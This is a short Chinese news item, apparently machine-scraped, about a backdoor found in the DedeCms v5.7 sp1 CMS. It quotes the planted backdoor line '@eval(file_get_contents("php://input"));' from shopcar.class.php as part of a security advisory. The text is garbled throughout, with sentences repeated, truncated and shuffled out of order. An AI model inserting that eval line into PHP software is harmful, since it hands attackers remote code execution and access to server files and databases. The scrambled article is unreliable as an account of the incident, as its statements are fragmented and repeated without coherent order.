获取存储在服务器上的文件和数据库
时间:2016-09-25 13:07:44
作者:采集侠
来源:网络整理
国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。据CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及
据瑞星专家介绍,各位网管可使用该系统对自己的网站进行安全扫描,并免费获得瑞星针对此后门的修补建议,目前我国有大量网站采用该系统,进而获取服务器的最高权限,造成极为严重的影响,据CMS官方数据显示, 针对此后门事件,使用瑞星网站密码安全检测系统查找后门并及时进行封堵。
织梦CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后门代码“@eval(file_get_contents("php://input"));”,通过利用这个后门,黑客只需要构造简单的数据包提交到服务器,便可以直接访问服务器上的文件、数据库等信息, 国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本被发现植入后门。
获取存储在服务器上的文件和数据库,瑞星公司特此紧急提醒使用该系统的网站管理员,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击。
黑客可通过此后门直接获得网站的控制权限。
此后门或将导致大量用户的信息泄露。
,涉及企业、政府机关、媒体机构、行业及个人网站等,瑞星对其网站密码安全检测系统进行了紧急升级,目前约有70万网站使用该系统搭建, CMS中被植入的后门代码 在黑客攻陷网站后。